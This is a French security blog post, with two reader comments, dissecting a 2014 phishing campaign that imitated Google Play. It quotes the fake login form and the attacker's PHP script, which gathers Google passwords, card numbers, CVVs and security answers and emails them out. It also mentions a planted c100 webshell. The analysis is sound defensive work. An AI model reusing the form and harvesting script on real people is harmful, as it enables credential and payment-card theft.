Dissection d’une attaque par Phishing #1

Published on: Jan 22 2014 by Loïc

Phishing

Le jeudi 16 janvier 2014, Calypt a été avertie d’un email de phishing diffusé le jour même. Après avoir avertis les différents acteurs, nous vous proposons une rapide analyse de cette attaque.

 

 

Le mail

Champ “From” : « Google Android <support.clients@playg.com> »

Objet : « La date d’expiration de votre compte arrive à terme »

Corps du message : une image hébergée sur un site piraté (marque francaise d’alimentaire) qui malgré notre avertissement et acquitement de leur part, n’as toujours pas retiré l’image :

Phishing Google Play

L’image contient un lien vers le même site que celui ou elle est hebergée. En suivant ce lien on est redirigé vers un autre site, vraisemblablement piraté lui aussi et enregistré en Pologne. Comme pour l’image, cette redirection et encore active à l’heure de ce post.

 

Le site de phishing

Une fois redirigé, l’URL du site est http://195.28.16.33/Service-confirmation/GooglePlaystore.aspx/gAuth.html (maintenant reporté comme phishing et apparemment nettoyé). On y découvre une page imitant parfaitement la page de login Google et on est invité à rentrer notre login google et notre mot de passe. L’analyse confirmera que cette page est statique (html) et qu’aucun malware n’est associé.

[pastacode provider=”manual” lang=”markup”]

<form action="gConfirm.php" method="post">
                    <input type="text" name="login" placeholder="Email" />
                    <input type="password" name="pwd" placeholder="Password" />
                    <input type="submit" name="submit" value="Sign in" />
                    <input type="checkbox" value="0" id="staySigned" name="staySigned" checked="checked" />
                </form>

[/pastacode]

Comme on l’observe dans le code, une fois les informations entrées, on est redirigé vers la page gConfirm.php. Cette fois ci, nous sommes sur une page imitant une page de Google play sur laquelle il nous est demandé de rentrer notre numéro de carte bancaire, ainsi que la réponse à une question secrète. Le motif employé est le même que dans le mail : vérifier ses informations pour éviter de perdre son compte Google play.

L’analyse

Le serveur utilisé pour le phishing (195.28.16.33) semble héberger un site vitrine de société et il y a de grandes chances pour qu’il ait été compromis pour ce qui est de sa partie illégale. En utilisant dirbuster, on trouve le répertoire 12/ contenant le webshell c100. Les pirates semblent donc avoir laissé une backdoor accessibles à tous …
c100

c100

On a donc récuperé les fichiers sources de l’attaque dans lesquels on remarque, sans surprise, les éléments récupérés puis envoyé par email :

[pastacode provider=”manual” lang=”php”]

$mail->message        .=    "======BOSS HERE IS THE LOG: DATE & TIME: $date AND IP: $ip=================<br />";
$mail->message        .=    'Google ID : '.$_POST['log'].'<br />';
$mail->message        .=    'Password : '.$_POST['pwd'].'<br />';
$mail->message        .=    '===================================================<br />';
$mail->message        .=    'CC : '.$_POST['data1'].'<br />';
$mail->message        .=    'CVV : '.$_POST['data2'].'<br />';
$mail->message        .=    'Expiration Month : '.$_POST['data3'].'<br />';
$mail->message        .=    'Expiration Year : '.$_POST['data4'].'<br />';
$mail->message        .=    '===================================================<br />';
$mail->message        .=    'Security Question : '.$_POST['data5'].'<br />';
$mail->message        .=    'Security Response : '.$_POST['data6'].'<br />';
$mail->message        .=    'Full Address : '.$_POST['data11'].'<br />';
$mail->message        .=    'Birdthay Day : '.$_POST['data7'].'<br />';
$mail->message        .=    'Birdthay Month : '.$_POST['data8'].'<br />';
$mail->message        .=    'Birdthay Year : '.$_POST['data9'].'<br />';
$mail->message        .=    'Full Name : '.$_POST['data10'].'<br />';
$mail->message        .=    'ip:'.getenv("REMOTE_ADDR").'<br />';
$mail->send();

[/pastacode]

Bonus : l’email de l’attaquant (trouvé dans les sources) : send.chanceux@gmail.com

 

Conclusions

On a donc un phishing double, qui cherche à récuperer des identifiants Google et la réponse à la question secrète ainsi que des données de cartes bancaires. L’attaque reste basique, mais on notera quand même un français de qualité ainsi qu’un design soigné, copiant de manière fidèle les originaux.

Filed under: Headlines
Tags:

2 Comments to “Dissection d’une attaque par Phishing #1”

  1. Marc says:

    Bonjour, en suivant le même raisonnement j’en suis arrivé à chercher si d’autre sites relataient quelques informations sur l’email “send.chanceux@gmail.com”.

    La personne en question a récidivé avec un autre site (même deux si l’on compte la redirection). Je vais essayer d’avertir la société de médias hébergeant à ses dépens l’attaque.

    Cette fois-ci on retrouve google play, mais aussi crédit mutuel et edf.

    • Valentin says:

      Bonjour,

      C’est une bonne chose d’avertir, malgré cela il reste peu probable que l’entité visée réagisse..
      Nous n’avons eu aucun retour pour notre signalement, pire, des semaines après, le lien est toujours la. Mais bon, peut être que dans votre cas quelqu’un de raisonnable fera le nécessaire rapidement 🙂

      Essayez de reporter l’adresse sur gmail (https://support.google.com/mail/answer/190737?hl=en) également, pour que le résultat soit concluant il faut donner les headers du mail.

Leave a Reply

*

*